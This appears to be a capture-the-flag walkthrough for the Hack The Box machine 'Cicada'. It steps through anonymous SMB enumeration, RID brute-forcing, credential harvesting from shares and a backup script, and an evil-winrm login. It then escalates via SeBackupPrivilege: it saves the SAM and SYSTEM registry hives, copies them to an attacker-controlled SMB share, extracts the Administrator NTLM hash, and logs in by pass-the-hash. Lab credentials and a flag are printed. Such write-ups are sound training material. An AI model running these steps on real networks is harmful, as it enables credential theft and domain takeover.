Cicada

smbclient \\\\10.10.11.35\\DEV -U 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
--------------------------------------------------------------------
cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
--------------------------------------------------------------------
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
----------------------------------------------
user.txt: 1d12de2c4162688e2ee9ba080c707d96
-----------------------------------------------------
reg save hklm\system c:\Temp\system


copy C:\Temp\sam \\10.10.16.53\share\sam
copy C:\Temp\system \\10.10.16.53\share\system

evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Initial Access

  1. Enumerate SMB Shares:

    • Used smbclient to list accessible shares:

      smbclient -L \\\\10.10.11.35 -U "anonymous"

    • Found the HR share and accessed it:

      smbclient \\\\10.10.11.35\\HR -U "anonymous"

  2. Found Credentials:

    • Discovered a file containing credentials:

      Cicada$M6Corpb*@Lp#nZp!8

  3. Enumerate Users:

    • Used nxc to enumerate users via RID brute-forcing:

      nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute

    • Identified users like michael.wrightson, david.orelious, and emily.oscars.

  4. Authenticate as michael.wrightson:

    • Used the found credentials to authenticate:

      nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

  5. Explore SMB Shares:

    • Found additional shares and accessed the dev share:

      smbclient \\\\10.10.11.35\\dev -U 'michael.wrightson%'Cicada$M6Corpb*@Lp#nZp!8'

  6. Found New Credentials:

    • Discovered credentials for emily.oscars:

      emily.oscars:Q!3@Lp#M6b*7t*Vt

  7. Authenticate as emily.oscars:

    • Used evil-winrm to authenticate:

      evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Privilege Escalation

  1. Check Privileges:

    • Ran whoami /priv and found SeBackupPrivilege and SeRestorePrivilege enabled.

  2. Dump SAM and SYSTEM Hives:

    • Created a Temp folder and dumped the hives:

      cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

  3. Transfer Files Using SMB Server:

    • Set up an SMB server on the attacking machine:

      sudo impacket-smbserver share $(pwd) -smb2support

    • Copied the files to the SMB share from the target machine:

      copy C:\Temp\sam \\<Your_IP>\share\sam
copy C:\Temp\system \\<Your_IP>\share\system

  4. Extract NTLM Hashes:

    • Used pypykatz to extract the hashes:

      pypykatz registry --sam sam --system system

    • Found the NTLM hash for the Administrator:

      Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

  5. Authenticate as Administrator:

    • Used evil-winrm with the NTLM hash:

      evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

  6. Retrieve the Root Flag:

    • Navigated to the Administrator desktop and read the root.txt file:

      cd C:\Users\Administrator\Desktop
type root.txt
PreviousEscape twoNextHTB Permx Machine(CVE-2023–4220 Chamilo LMS)

Last updated

Was this helpful?